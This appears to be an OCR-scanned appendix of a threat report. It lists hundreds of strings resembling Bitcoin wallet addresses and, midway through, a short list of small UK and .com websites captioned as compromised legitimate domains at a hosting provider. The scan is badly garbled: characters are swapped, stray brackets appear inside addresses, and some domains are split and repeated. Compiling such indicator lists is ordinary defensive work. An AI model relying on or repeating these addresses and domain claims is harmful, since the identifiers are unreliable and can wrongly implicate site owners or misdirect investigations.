1LgHfosuCBqzSW7DkbUR3ETsi4spwMAJ7r 
LLgWAP9hrmBNH1ip21rvsCwuxp5mGDjCG6 
1LLh9VSBzdgahFmkeAPoFT XGvdHJWrTeXA5 
1LhbzG1953mFBnfwAhYCjZVQLhHm3Wpruc 
LLITVCr3XXZKY8BBte9N9tCdGkKWvUDE5cf 
1Lk4SKapqxweCyKY6k6uxbmUny1TRzoj3y 
1Lnc5HKgRRv7oHShgzCHc3nJzzwoMUmx8Y 
LLnywDQQJTw6su2EHQsBtssikmU9GIm1hr 
LLolcfib2EN6xmSvUFZTtuLrW8hWeTETPr 
LLolwYczsWBU3SSDVGNoYkaluHPgtYAlgm 
LLo4weQmQiQdNihtRrcVF8EyoyoBCE7abp 
1LLoZEV6PqjsWvw9AkAzmLHUs91xyUDKykK3 
1LqK15JR8BZWHS63QVFxZsrfMjRKSCjJWve 
LLqgjz5JYeSLNVqm3senny31hxB626hPnfx 
1Lr63FmiRUHUG2muVSvcNWcKXjQKnBbw21 
LLs2ENvaWT48qpeu/7/sjprP7ag8E263AKkK 
1Ls393saK1N8xkGxrQrkesD1i81damVQsm 
1Lt7VGUrrxMDjDma4BdBq6XmdH715N5kME 
LLt]Ko709LGbjQR7Gr4c1RaBZinvFulYvxX 
LLtKAZkXxtTFs3WkhVwwfgcJ5zv3i4837r 
LLtiNBCtBn41ZZ2Adpw7uem44hqa6SyaZx 
1Lu2ZiVG6dyaRrGS29XamXSukKmaJCrsGAb 
LLUTZN2NXfCMSR3XF2Y]pvh3gfAawGPuJT 
1LuX60zV5EUwnR3scqmiytk5Vf9C|sf2cD 
LLvZpXU89e3nZZ46nwi9Pjw12Donkm6Pg} 
LLvjTxjFnjomvvMK8CGx1qZ1zpLJFUFRmq 
LLw75MwPqc4nVuL7qEGuZ1UWZPye8sPDNZ} 


25237 


LLwf6fRf5tu9us6fF4Csd3fEbn9xtQ4ptF 
LLxfK3Wqz8imGDwTx3Y1YSBjZDUym85 Tug 
LLxj1NB4712i9ESkcTfiJylrMXvQvpx2pW 
LLyYoZJD3Fo5w2c778zjMT8piU1CCqySAB 
LLygTHjQtprX5wjjVjJNZVCkKD9J5ySqxgD9 
1Lz1f4tFRVwb9DdVuoXKE1xrH5XCh9nHrv 
LLZMryc4C7FWwEg1YjGt2Vz6bXxXojkXgaSwG 
LLZzqgWY18N20USBpTyeLN8zQxgrwXAzCfP 
L1M1uQCAPcFmZ4ZY2uAnjNxyJP7T9uy2iK8 
1M1z2Cx4ZhdSThMJVdLkV6EjchyepwPXWh 
LM2RFjX4TudsQChVrzM5e7cy7KPtza9z7K 
LM2Sb9i3CDY6jCybXfdFgEPEG1QdtAHeoi 
1M3CJHMEMvrt9HX7BeHmC7awtTZJxE42uV 
IM3ENa4SpWQuozr8foU4CVcytX3L3qZzM3 
LM3iiEvfRTFGkYKGria5L58uZ32SB827ve 
1M3s3Vq276nU9QgaLqBUaTyXtfH5BNZCNT 
LM4pN4rH4LfXuTaJCL5tpnXJkbVRC35saU 
1M4v582kwR36TqxQugnoYJUIRZQPAc7 XBq 
LM5Ay3EW3hxztJEJgav 1LDpwpYHBVycTJCZ 
LM5Y5UgTBSBvZNf5ZBgvgudqxgT9vVt9JB 
1M5sPacRrVFSqceDwAF8fqfUCmqRuHqs1D 
1M5uVurG4wxyxw92xVLyAnmcUby8b51pN9 
1M71U3REvt6aGJixx89VqD8G16XhcPVFPj 
1M7DgMsxLD8xrGp59p6Mkr5uHFBkmn6NbH 
LM7Jao2p2yd8kUinpt9wkEY1FJ4FkoaM1D 
1M7LxUfDLBjyYfByFsz6BamEVTi6kEVpnz 
L1M7PVK12MjYL8ZMQ9XBfRX4MQRC56KLS9X 
1M831CN71Bi88t)52 1ufVF6kcfi6U43XUB 
IM8HNn9T3SvfbCAstXSwRdkpKYMnQ2SUva 
1M8PZiG4GgssyyzduoF8zwcS5WanTfHH5X 
LM8UMdxAndAYAVCA1a9q17FbFyvNHxqiNi 
1M80K3D2G8ipTy7sCxiatrHC35CpAgmrrw 
1M940iRJMiCHQqMYDcStr41QHtcwQzRsnx 
IM9hk1S3KUMS1j3BYkoTjk5xMXstdDW6)]) 
LMBHZGYQoHd4QVwaqpLGzAAex8im6Fy6ety 
25238 


LIMBmiyQVLnHRsT6dzqrEZKQp7qRKVhA5Bt 
LMBrT41jvsjdwnS8WcHjLFLQkmnSrhm4ED 
LIMBwkTssJkqRvXmAFcSEZ3xTD39A9rkyYA 
LMBzh8RQuwtw9WkKuvjnJ84RE945WoDp6éc2 
LMCBQMPkDP]q4p80bmGm4txV7iE4zprekm 
1MCymsUjJecMipBkKcpqkKsZHdJCLBSyBcC 
IMDdqC2yTwanx6GQva4EGx4FxXftU5yam6Xx 
IMEZHGGWWXt7Zf9EvczxtCBRkMyK3SH2BR 
1MFaaMGNrRUzYoa9zZtLx65easzniZYXHW 
LIMH2zq6Ja4G1ZhW2w9mxbxLUSLAZtDpnx7 
1MHya6pK2JRRpnKhayyvXM88BK6f9Xekyp 
LMJbmG82jSWc3aGp9gZ2YKQU4UGVQ8dzhP 
LMJdsj5ioTFiTURwWCfgJNDCTZSBJGEchLH 
LMJgqfxGEwTjJFQNIN6yArPq6STN4xfv6Yqs 
IMKQEH7UW5EevY1oEepTAtpefiUKpNHCcYj 
IMKRNqY51XemNCBVyBYxVdRGxLLCWMJpkF 
IMKkRUoALpcaTVgYPqRWRHFA4ySr2DW 7F} 
1MLePTrPRVWEQncbNjcSE46yvzZH1dhZ2R 
IMMWAFHsa2Vi2mMhRNhDRvFQ)JQkAWAurWoi 
IMMgCxreYHE2JwZKEgdeWxv2KTVNGKWfMC 
LIMNfPgJ3F224ZyXRWT2KuDUapnykmz3YxX 
LMNiQgnFdhTKe4a5A3cmqTd42bRX2H2TZV 
1IMNssk3jCASsnkTdDmeWu6CirFiULV9wB 
LIMPHyKG9mZ8yXjjf4Zn4jb2FJFNUPTD1y 
IMPXAaL9JjupHnUPdK3Z7vvjznZcMEnD7r 
1MPa2kWxnA4HLptviR5EWwuYXHiSc4vEvx 
LIMQHSwTA14PmkzVuGrgK7U1WRgqMbiH1Cb 
LMQRtPpbJxA54vHkToR9IW5xRKKVpjS4fz 
IMQsZUfze978eEnNS2VIJZRz7WtiLXyTagH 
LIMQv9Wjp8YD1VCcfm9Z5Yae4L3E9YQcMHZE 
IMREw4wu/7SbEYvi6feuGk6wSMZh6GrfCa3 
LMRNhfDxN2bLw4zWGdpmRxwn86Yv3YY4Qr 
LIMRRP7o0fGC44AZFWi8cAMfGCQzcNwb6Duy 
1MS9u6JoUWfDGPSZHskZcMUpyipmFfxDKk 
IMSWAZterYq5XC4KqZ9GtjqrYFuUjc1l6qu 


25239 


LMSWMRXQrVbFrWsq8fFdusD7AL8GfwD6Bu 
LMSiPjzZ1vMDaPY4y5Uw3T2cfuZcxekBdUe 
LIMTFKM2Ms40XixYs8mtVp5ygkuoN1HQ1a5 
LIMTXxKkzSxz5GfpKXspmPZdtkjkY4aHcFXL 
LMURTa4zwZWM5uQH41KmpLU8cudFG6qeil 
LMUchqHMaPp3TX8bF1DRmfsbk9c4ocuMhK 
LIMVBy6T3crh2TLvsMjLGf6tHtZmMConuFz 
LIMViQ9sSrDiLREwbzttPjzBUVwDwWRcrBa5 
LMWMon7c4yZC7Z78fxZS6DKcHtkuHg9kj1 
L1MWor]vgPXETEm3HrWa4ZRQXeHFiXzd80B 
LIMWkG9sSfQWh8QAOTMmuZpz3rMc3Bbd3JUj 
LMWnHNrvYyspNE76FAZqbNqFKeBJAGVViY 
LMXB5DCg7tRnUk9qNb3FcgUoCg1XFBaDzT 
1MXSv9iusxJMBminp36hZBARZKRtLefTA3 
LIMZH6ZQFXjUroNz9GpG74YEJUMK8u2akx2 
LMZJY5fkwanU8B]7mbveMSFb9rzdTCSjbB 
1Ma7j1lUgroeJEwLhqRQeUG4Y3fmcVUzdGW 
1MaDuc89MtcoTFK61leRyeM24rHcGRBvrEd 
1MawPRCamapkKL1bsbZxYExCNJcW7xmA8S2 
1IMbXszNH83GTKr92U5brztH5 XiWFYGBwPj 
LMbiXqv6qS3MHf2hch23ETlazvHTgMnibz 
1McuaaWZ8NEHvzPa2NtC269vbWbBUbGx4i 
1McwyPrMESeMETKDZ4mAGvfZUgtEYiZcCA 
1MeLo8ehMaT4QdvhgdGhYD2R7ChPPUXYEc 
L1MeuTCmHfeHHbUXhMbcQtjqgEQcs7itfkz 
LMfTd4nWLxsg49DwSU4DSeCaVsw2DZcF4U 
1Mg5GCH1JvJvw6vicqibBL3igQqURARaEZ 
LMi2ENZkVHQqfMtfHPgTfAev7v3P7W5SHU 
LMiVgMzYXzTxnP4R2ph3S7xmmtr6njQtZVv 
LMjTsSASkxzN59agj3pVGLRgNsd9ZskKeAkm 
LMkjnnzwNyt9Kj8h7hcD5e6xn4LsY6FulT 
1MmmNonNzcdBP8bWheBnA9rMg5fv3Nnknn 
L1Mmsg4ww7rXKcMpUZWzbQiWgYgubBZm24u 
1Mn7KyweH6D331pp5MxfwZVRnXxcyryTkzZj 
1MoRrDkdgok5zi4bCttXDXP13moxdnAhnj 
25240 


1MoWyT8Perux324bpWDhBdhleTtvR8gw72 
LMowpgqSpdsQez7MGDLPgbi6QbChiVSP9AT 
LMptAnBuNJQ3xLEmp96kuFEsSVfnLtzSRYj 

LMqf9m3wCfHknzMSKw5uF7fEmMVRAmFbqQ 


1Mr8tuMzAemwMCbwPWEBu3rGynBSBNeAMw 


LMrkJhiECV3RufrY1dSybSXRCwSw11Co6i 
LMrMMMYhUWoWrVRZEsrPejGVybUy6sPM6u 
1MrQ48sLdt3WWtgkuXYD6Ge4N48i8V2Lge 
1IMrSZWCKNsrVHYhP6pJvtUkintSB)]XuAnw 
1MrnUHFADbj5S9ERJ9bGXtQvhx81TFZtMN 
1LMrnUJGpekFzPVT229qbMn7Xqw)jgCD4p} 
1Ms73SXwcbFQcJ5Jf4tduGv6nmjtR3tPc 
LIMsCCDVYWK4ADGpSceLWi7g18pzByceDTR 
LIMsCsEPC43GC3j2GA96nV36NysKX747tE 
LIMtJGPT4hCtfP2HKQhH1E7Rn7s9hhjJnmFdu 
1MtgZow]WisgC4gawQHsxfzCshqDMiEauT 
LMu5JJgmG62CjL7EmGszACbrTfdrWTX47s 
1MvkxCQe8eFAYNK9QxEUAW 7 Mz5fxE12SFi 
1Mvppza8wVRvkRR5VvaTuvmZzQ14sMeB75 
1MwSseYPdkEqKM7LQr3ZmQVyuJf9w9yfEX 
1MwsvxXf80p1JCe9PS2HFWYCK8DasxqVsAP 
1MxcEfjBuYZPswkYsqRdakrvlvWaVR5Kqv 
1Mz146LE4jVPfsKirMPXUyGrtug4UEf92V 
1MzDZy9dFkp5Lzkbir7nXK1GcpZbx9pPUj 
IN16QAcAAKg8SQTyeuoEPgXFNJWmpxZXmB 
INlypwrhGS6xxcGRCjCtHHmAYUze4Xeyiw 
1N2XrFyex7JoGQu1FfJ|UrBq6wXTnvaEN8e 
IN3Ud8jf3rELDkKQKpwyW9noY6iDCdaz6ae 
LN3jmMFPjJHYZkKHcbuCLUZGHpuQkvSqYumFu 
1IN4eCCKx130tFpXadE2gJLZTJprH44Qg14 
LN5CpNtaHoeUjwnThTRzZ1NdqGSSiVg8Zwq 
1N5Z5j1dUxk5XiFGCWCTCNFZGwmzkeFsMA 
IN5ZbFDT6qjwaji63f7ikckn5TBS1TW1KS 
1IN5fzCDFUVQPKEKTdP6p6C8pg9bXbXuDkw 
IN5mn11k2jKYUhkqDnUFSDuMSVazWadt15n 


25241 


LN6cWYZRF7gLDQgkGwnRhc7rFmQhjYkvqs 
1N7CeXWSivghcT8boaqAhswPixvZDn7UwWN 
1IN7yKWHyPTvb3bgK35x7RgrkrpSJJm4YGs 
LIN8YWNVNZxABUPxThZmFXEsx4nsoBN4KQA 
IN8c1RbVTkkuQBtdSjhTH4DTEeLn3ieQGg 
LNAjz3uVkYJjVvsEa7tz7XT/7sPQy4RQ1lof 
INBDv7ReSoAxqNT4QXDPk93x3KkrtyGtTU 
LINBVNAQ8zudE6Z3MEaQ8jdhDgqXcJYpjUxe 
INC5Hrv8L5NFezKcumCGBsnjAbVp7xQeeR 
INC9m4hhbUuhFrWsPCg6VV6AU TsahAbWym 
INDqDCASvhw8dNPH2DCs4h4c8SNJlachp5 
LNEONjJ9HLVIA2xkGYX4ff1Cq5cDus7SxML 
LNEDowT7w4kMFhwv2EARsvj98UPTM88n8E 
INEQQWLZvK7Jsw1FDKDVxDuxgVpaRMevVtr 
LINF4hDwiQf562SaTNsRA24yF8aRtgRepPD 
INFDhcQVZ9BaeQds92EQ9nxZk5U0SXd3gx 
LNFLUP7WhLaYU2jXhScEpF8h3rSt7f96cn 
INFNZnvxwibBDDAvDHjZVZmx3EYdHMD6xj 
INFilWw8Qqg2hu98pdTL8xuwZZYUEPNM69 
LNFqAZHFkai3N6RVX2BM ToDvPHypnQ1jMP 
LNGeBtk65pVfDj50AmjfnsY4mG9JSax2mj 
LINGsK9hFg8ngj8M8WZKF79biGpFiw8dj3W 
LINGtvWJUuFEq2wma5YEi9n3TD7EDUj1LjU 
1INGwaMMpmd1y5PV7bm3DsR7zJB9auAiydQ 
INGxKC8QSC9HT70Smae6e24HDpt3VrwrbWw 
LNHBCtHcniHQhxXCszueWhrtM3d5UPfKB6W 
LNHDZZHKMPCNC1YvZ9PP71RwRsm8stBCMFC 
LINHHumCT8FFyUmeVLNgc7FZsBXAAgHWpzd 
LINJBhokXmU6eUw9FdyBfef6h27pnecSnha 
INJZ4EVLkWj19tejzm3PnwqwRjifGNnd29 
LINK2voLxoi2f9ytq8iZaDkG4pb7kT1b4qF 
INKD4SKtvLZ7VLLx8HxyophPArYwCtMDUN 
INM7fyAyRjJKQVrCzmVbBCYyHRLjNC11sY6 
INNN4U8WRzkCu5Ce3j2k6HpkXHvDuSQaA8 
INNS98bg4fyVSRGGj8GFEMPDR8MwSMtHqx 
25242 


ameditorial.co 


19 48 


ladydestiny .com 
marchbrook.co .uk 
mgwooldridge.co .uk 
midfleet .com 
mikedz.co .uk 
millypeds.co .uk 
mitchameditorial.co .uk 
moddeydhoomcc.co .uk 
monkeyfist.co .uk 
morita.co .uk 
mosoul.co .uk 
mrbuzzhard.co .uk 
mtbpigs.co .uk 
mysticspirals.co .uk 
mythagostudios .com 


neilwebsterhoundtrailing.co .uk 
newmarskecricketclub.co .uk 


oneintenrock.co .uk 
pcook.co .uk 
pengineer.co .uk 


rhoundtrailing. co.uk 


pcoo k. co.u k 


pengineer.co.uk 


Compromised legitimate domains at [19]Web Hosting Mania currently in circulation: 


2527 


LNQBjrgscitLwd72zbuf7JejRv5riwfhgZ 
INTDtYztjKJFj/ L9MUVAMRseb125e3LA3p3 
INTj8qP8cU4tp9UvDQJTEwh97yaYxX4MSZ 
LNULipDQP79xJTLMRwCXmpJA6LHSnurica 
LNUnGcMpYkiJVAaHiDZAFoXWB5LgJwQt6j 
INV5fiTR8ZNmDgNragcm2DTLeEHF 7VDUsq 
INVQYjnGrBDX4UgniAwLCzn2cZW6pzoGDM 
INW5z9DbSx/YiflBsvMZxVDc1G2J92xCWdj 
INWkENDbBUkSgBQFwSFs14PKxXtU1g1FjLv 
INWqRQV2bFbKUNosTvmhrDbPhYcXMucbtn 
INWsX2H9dCr2QWDMD14NYrykaoUXHQDRFx 
LINWunQCwcSePYWnv6Mjzoo5gvSFZ85rzd6 
INXXVjX96ZKWCc8SFMEyGexLvmDEx8zkLi 
LINYEF9uUwW41LbPkjJnRseibow9QNgCsuRS 
LNYj3KKqxE6QAyqxxETPPeamKuColE8p3a 
INYjVDGChunbMkAXrxXfY92HkEPYJ7Ktmet 
1INaKGBsSMv6KfMXAbYyHbrYFaja6MT Xzyqt 
INaRMgB35pGH3hpoYYCUm4cKatA36pxtxs 
1NaRcsEc79BYP7 7fQEXcU7E2GJoEebmdfWw 
1Nc9j6YddvoJZhWD]YeggLDBYAPQLvCoao 
1LNctrrjs2zEdmJAGifm4bAkj5EsPnofwfE 
INdhXXWURuJ9LUQ3NrRFZHPrdrQ9EP29Ab 
INeDMJA8pzwyUHvdBfNdT3xw39RRsSCMXi4 
1NeiGxRsrXXglyv81Ch6QEEVft46wpEY2G 
LNfPWzyxt]PeRJDpWlexslgfuGPcVWCmun 
INfZ8yPaRrghlispsiBLmdd6wwsyTL3fUuV 
INgKMFRtnpoHFmPyjQyqHQdYMWK7hsWNPG 
LNheppii3YLHNqUrbFjimkrYVNDCLhQroy 
1Ni7HS9PdWFHoeze4BoZ3XVc5 THuxBgMHf 
LNiTN3QHXBoZS93PdyX6nApa3PACUBOYHW 
LNjqPPyUDJBhia9Mv4rRFSZWjDyhmdnbmZ 
LNjvNNcCB7tZmUirW90iUW3xuA6CNID3MH 
INKRNEL1loyonoWSMLKge4in9ymqL6xfFoE 
INkVrmuGBSEFioLnbSoFanUVYjmBuetU1X 
INmMH4zWgXZomJuohsqc9wHsBBQ43hYTQx5 


25243 


INmq9gfXkFqReQnDz7WyzAB4qmebiFC]W 
INnsh2X2J6FYVSCgn3dFnsq44ekQ6tsqvA 
LNoUT75z1wLq4ckK9eWtcZ9EtnM9xcjTDL2 
INpctH7TZy9vk1AcJ3NrmTIs5xCbM5hrxv 
LINph7txvZfzPLCtdNGQN2RkTgY64QaBqpL 
LNpoSJ9bXfwZBWzntmRuh7zT8e95LWAUn4 
LINps8TCHMfVK2ZKHRqkQAUGQZA8kqSpjpB 
LINpvr9UBLU6E9ASDVeRhx]JqeBo4xFkjf8w 
INqkUyWnzpk4YHxnfUE2ivr2ZFefFjzkxp 
LINs6ZWNc7ewj9qUZptuYooMMdpy1EzkrjE 
LNsAYEhecnYYN9kKBMR1Rre5AgxJXfyxARB 
LNsAyS1t1VbaSpG792QQwckWAx6Xns8wxX 
LNsfxxsWh7q7T6SFj5DJkJZPcvukK6jtwD} 
LNsyVQP6aGHAJkzRKDU9SEDEUV13nKTL2EL 
LNtWDuUVedzz9XCrFtfsY8fv2ilrbcR2h1N 
1NumwMsmdDGU7LnRpeWcucotrvkWLcWC6a 
LNvd6pd90F piUfaAaeZHDZTbaLAZWGJVf5 
LINvf3umWPi3DWXbi8uQB26TMSeHFHnoiMy 
LNwJ TWw6665gbqFtN69ipG9FyU5gcnjnEmn 
LINxc6EWBjkyzV3Si4FXfh] pQiRfTeDjigZ 
1LNyajJGja5x2MWrd41qsS7unSRZkXxj4SC5 
LNzjeYgx6GPzskgBhbMEk8MTqC6HV9CFya 
LNzuzksjGEXrJEaPFWgpCKJf8nzp8zDz8v 
INzyJwRBC935EdbpJ3VNLUg2EjJMdYSHfmH 
1P1nSf3EY4HcFKBjvBwAhT YcwsC9vPkyxd 
1P2EzsXZZNDtDwTT403kkxj8wGbsrDK81r 
1P3qxFBUNCLPA4yyfBckqYgtRNjQaWHS8Y 
1P5DEehugsHA3gjfSoZhycjE2tjPsyU4Ff 
1P5bSkdDZn6yZphQYZEdqC9CzZoF5m7nQru 
1P50mownLwijuv94fVSpqqV45r42ub5USa 
1P6XSTx8xBONXcoqvtInrgeyY XCrrzBG2PsE 
1P82XcHGPtG7BtCF1QBC3d5rVAHzxgvMv5 
1P8H5xmsUq1jVDKN50v8USMN6utECqDyCx 
1P8PK3msM1RTaCnggWkwcdRKv7xAnLQoR6 
1P8wULSdf5KPny3CwJo6eAdBotC7692QZG 
25244 


1P9KvT 7p80HwpG5d8S8x8wFLjWbBiuakKMu 
1P9S1C7fHdJLEZXxfPxzz4baDrgGhdCloz 
1PA4zm9JcwUgbMsxRZXhX7C4m6koaSr1in 
1LPAAZBmSVntpn36nAMX7uXpY32jJ8Z8mLd4 
1LPAY3uUFLCfvzMK60JW9pDazmod6obtjJCbb 
1LPB9QTdCicwJdUSVXWjVAF5cKqY2ux6SzT 
1PEprKepa2LGxhUjFiENAnNKnK2SisS4vU 
LPFVnGVKUYWW14sM8DuW9RxLqmxXYC18hfr 
1PFYqL2eCgvREnzQsbq8mFcxvdlyjraatA 
1PFtDe2Qx7t3WjDKh15VyjwDBH2nXgymzD 
1PGQFmL9pDcXuRqczp6jZtUmMoNPLU8niv3 
1PGTmdkrKuUNGKZ4GfHaXG5m2V5X9peu2QE 
1PGY7C2H6EXXb961LOBashkycqWT5vgzkAJs 
1PGcvB7gqNG1luyd18jPtBe4sSwFziJqyDe 
1PGjJAZVUEPBRWHgkxrpRR5ZZbdrm7qFic5 
1LPHcj TMT 72dW5jyEtpn3MwCSgAkoxWGoa3 
1PLkXZZ4htatLnCp1lpv4dkXTRFnBWirR6g 
LPMCNRBHP82HPBcMHHF3iakmSszrfZi4aP 
1PNYBorNSq9LmWgewUgeBmtXECDMN5BjT8 
1PNkbz22YtP89xkTZeQRw621nUHkv2BTb5 
1PNzqHdk3RGe8qtBeCEi3LejWwFLINp5UkzU 
1PQZwFCCV6E1wtCup9QuSArRzpAysYYYHf 
1PRHRbMEL14gsldd5qL2Zntvr9RKRrxXsXn 
1PRjJKEKKnP26wdwERkVKdzL93mxdtY4S1v 
1PSDtENCyrGTg1lg6Euz5F8CyAeMyBnnxZD 
1PSQNDgheeaiVLB5tfzr9L2DQtNaTtt3sG 
1PSV1kvgW209UVyinRjjnguUEuJ99gXYR1m 
1PSm1m4cTJPt485kBxGy9p72wtvehNPCLS 
1PTIZVYLYC)KZmoSVDjua3KdSR62Jfztih 
1PTn2ZdzYM3uo0b9Gpw]Vrp6ér3MBu8nR8ED 
1PUjjxjpC4ZPZbBxzP7ygBiWSj9SZ2UVe3 
1PUopqHuSKojGRiSMmULyJ3F3qUvVtrVtkb 
1PW7dp3xGQDTwmrxeh47uwyXYMB4bjifLP 
1PWaLWxWSyGaqlivdGUkBQZtMBrW1FhxXt4u 
1LPYp7RjJjWYUhEw3frCSuMvjhtMaYbexkvY 


25245 


LPYVONQtNWLbGcwjLjBR8aynvdrvpztsf4 
1PZXqvtq5 1 hHMw5kgauibPL7QZA86dD7Ne 
1Pa7ZkA9JHZwp8FazU4YBVSiYFPP3majgA 
1PaSCHNXdyLiAzE4g7Kr7SAT5YKNcoEQsa 
1PaUBuSWKyaDLINVxZZwdYk9QjtwtDtnjHw 
1Pag1zKdWsPv5ujjDy43mVaBv65J1lnGrLl 
1PahY8x3BXFJMfBhWmUpLofFMNReAoQUWh 
1PbLjmiWJNHZLUM3VG93RkE16JsuxkKNWDE 
1PcwSHc1GH28Z7gdCAd8wFBLTKEdy7hSAw 
1PdBpYerthEPLqKkyb9b5ii4ByrYA5t4sh7 
1PeVAGokvk56As5HugKHjebtajxXXvHh5R 
1PejWceqvbHNBgMgeDaExd8VNHKMPQjGWY 
1Pf9qGkbLr7bf8PL2)jDmb2v2awogs35iy 
LPfPfFPGX13VXgEdjy5Jm2HrGUySmCc4j4 
1PfpSmxlqg2tbREplgrWbSh8z1Uo0jzT87p 
1Pg6t3ChcXVvRhHHN4XKTHJFSaVFoKmUuHH7 
1PgbxYkxXaXcF|NCNd2AqFUgW3ZgA598FBD 
1Pge7gKopZvR313Sejz3itX2EQYCupp5E} 
1PgsYJKnnKk1mxLGY9hHFgtuBffGx2E9HR 
1PhdfEd2zGrxdX5FKVkXZHvEt4MpKgH6wY 
1PiaTFniLnijRgTfXLMyLW8fHnNn4z3sDs 
1PizT5zsVoP2FcQQpaqjKgf8n2JSc9WNXqC 
1PkKLN5YXhjUK4Wra2bsocgDBgKFMNT62K8 
1PmBwsRAjDrdXk]JKu7jQdWWEeoY7zVQLuq 
1PmUtd6JEt5dV3qJHG17nnsD9H3w5dYeGF 
1PmuTMenceP5GmkKF1xdf5LZkUp9vFRYWIiH 
1PnEvxMFE9XfokCuSEoiJPCBfhiMwBVnqZ 
1PnPJfx4ct8YHRnTnx1VrSnrZeQik86BXa 
1PndqvoFbjNf93TLPDRFGD1leqLMR1RKUtB 
1Pni3PsLb6FbT5QqgtSU65D7ZDqjucLLrD 
1PnpfeYgoKEpFPTiwYR9EQzgAxZxCVDGtn 
1PqrmK1W1x6KVUdMz3qVRbj7Fgg6HXrxXFb 
1PrS8L3mk3RcoWGN4wxkZwjDG5vcrsLFD3 
1PrU4XtjkchJKikkG3AkbqP56RNnxKRUVZ 
1PrrryFgVNByHtzb5cbheqJ 7gn5YqGBnXn 
25246 


1Prz2AM2 1sHNnNbeUnABTzaEqK7mTpglax 
1PsTiILSXHHz2ubESBenuATDrzBWPf9TfV7 
1PsrZaQtVazRMQmG9LzynULne9d9uwxkCh 
1PtZMuViPmxUujFAnmpwQZy7Nfh9wrSx8M 
1PtisLUXkgm3Rf2dZzsTuxwtfeQm1B5gxB 
1Ptm2WkegdK4GnJ3yTYdote2nxBVpX93Qe 
1PuLiFmAKhDVwkTggqzVGKMPGqXeoQF Mzc 
1LPUMBDYq54vTRU6N5VSEUnMvDbbpQF5LQa 
1PvvMn9RLK4P7H8jwCFfLq3f7BmeizYUul 
1PwA9UqPpWSqgASACLXNdc3aW47zjvgk7ow 
LPwJbGKtNx6uQFoYFb91bPNTr6maqyDcVra 
1PwTxZ6kdWxDzD7MNJwyM4LYtoSHUpAM54 
1PwaJYQHPFWsCM1G7Fx8pTzaVAr2ylaYan 
1PwdtKH2uPTpLv56hFhw9Pj893txYKKmEg 
1PwkHAbjCdeudsTmaufr8dHMBUkSXM7r9k 
1Px4gJyXhnfM9RfatVRMGdvFeANhqGRDBj 
1PxAkbLEW6dj39rpTNhSYD2uJZkUrnGjsh 
1PxXUHPuVfX8nPCskqdjqCXqsUe7Bknn1jM 
1PxWtedA28nfWc1Thmk9ESWLCnRFayPg8k 
1PyPgCdve9J yFwdwE4qeLNU2UESUAXxVy12 
1PyV8nER63MzvDai5xGurUBw]sei64GHNj 
1Pydkw5nyve65zynLJHfCNulJxmEconmis 
1LPymHLgR54ZfzQalTIUWhCv8GJArSvyct9 
1PzTt1KKtkKfsM7u2YpawqRECDHjB4Ne2Y 
1Pzp1VZBskCQ5QcZNz40d6NX40AW4SLxyr 
1Pzsf5TIGMm1yF4XGetURFSNPeGmdDNXww 
1Q19fZEqTmUsS4U37Ng2hVx4Xx2ZN7b4ZD9 
1Q1DcEdmxr4igUR8fPfj4LxnjWebdAyk2G 
1Q22cstDHRfE3nfH8gdp4h15QqkMGUeb6Kp 
1Q2u8rRi4Sg6uqxiM3qBwg8W9zsuCancPc 
1Q42aaDoDX5WM4dX7GWghzysPUCF3ukKr2} 
1Q4FdD5h89WyBUniWYUpzDEriH8KkNhj28 
1Q4SSpCYWxFiFmf2ZEGVD9PimfkzEaVNDZ 
1Q583zu9ZSab3A3Key4VFajfDUxouD7tN9 
1Q5Qnbf5TKtSHuRdvCaBcxXrBEfubdyAZte 


25247 


1Q5wxrPoaurp4AMoYu5ZJLt2qREYADYAH7 
1Q61YKBBHG8ffasbjSZBnYeQoYpfuNyvqU 
1Q62EgakKuZcweF74t7bk9dXbuhocW]XsPX 
1Q6nBovJUw1lqVTKfwX5YYhJxSPsMqgl1MHD 
1Q751m0KBSG70SZrSJTSNc8nBKZ4uyHxrc 
1Q7rFodzfJrEvivuQoSreLlynjht72vW7q 
1Q7uUPwKtwgS4subed5TnG572yGha8]Whf 
1Q8UYTUcwa5SqoG6MFUB43D5NzsMnqFDas 
1Q8in9LTODNMivEUykS8ZMzSZMhQorNYyEj 
1Q9K34Ns5VcYDC] 7MSNMm6wgbGyTLLxRUv 
1Q9o0aPtK2JBiIDPMqdBuFs5JCjY9kWXStDx 
LQARGVWJ64cwLChWodJiSDniNr4ch7vRtv 
LQAVNzfCo61YFOHHUcjSc8uNuVDKa9DeUK 
1QAc9S5EmycqjzzWwDclyiwzr9jJLC8sLiY 
LQBGqTQeFCVgAJFGTvbKiecCRVrtrowVhb 
1QBL4f71Pt2X8ED2h5kqPzFW79VfLf7LQ 
1QCjcWXcSUwZPje98J5gsu4wvpqw7mkKBhd 
1QCqVznkKdSSiCUehTUBeUTrBxzhgR65PTo 
1LQDfE9BCtAgqygqzMW52giPTSuu8xp3fxNy 
1LQDvBSQFU3WJQjkhXEfNS7RmHyjSEdrBUH 
LQEONKMiveEYTRRvvPfFjbK41W8KwuJaWwM 
1LQEFc6gJAOMLMToMUvKibNhUMFYfsaDj6x 
1QF7WH96VSK6zvFeZD79Q1CsR486nbBAey 
LQF92ZGVhHSYWMjmjxwfezKBzS3pay3Dibhz 
1LQFK5kyJEHTgWLsWtTrguU32ZUEqWjBH6RK 
1QFfwaeuUaFvGCzsGHLSQxngU4MveSwifs 
1QG23JauXWqw9WvxXknG3fFmrNyQkKudLx4U 
LQGYRV2iYL5qbx8PVfmTrAvpCvNmvBzBKM 
1QGkS4jctCnruvHWVLqnkDmyPYgmf1Ni5S 
1LQGwMTrtrzQz7WTxuWhlamZihWDfP]sr30 
1QHdvzxfkKXcpyyDiQioaDYAKWxhHNtfyPu 
1QHjUhrskhJ2wP76gYW1YUHXFx2pVonlqp 
LQKFVqH5eobKPWxhfEw9f2DxJcHoTCboHP 
1QLH65j7zcZePNBHs5YyD5diG4kZVTXZre 
1LQLMDiESMfefPEEtU6aWAWWZ6qPBexpHtn 
25248 


1LQMCzug1ACMFq2hWXbK4FpJz99SEz4caXx 
1LQUvn69WoONALASsS8jVVhHzbfBke3BpuD2 
1QbFU2faYnnPoZAUAEGCf]seW8aEN7TzV 
1QitZEoJvoz9E8e8ig4HJaXXaULN5ZKvi 
1IRk54RsWWZiRZvsrtp3WAdbriLHTga2Cu 
1SnaWs8yaCliuti5 7ZXB4TKCXZXxRMCLg 
1SUUDL78YmvBrguukeg]JY358GaYZHdDAW 
1SystSn9VNy1LRxC93)JjGLiqkaZ2sDV4ev 
1TJ)7nNNHawR5qHYHG1LirPAtTsdflanpXfH 
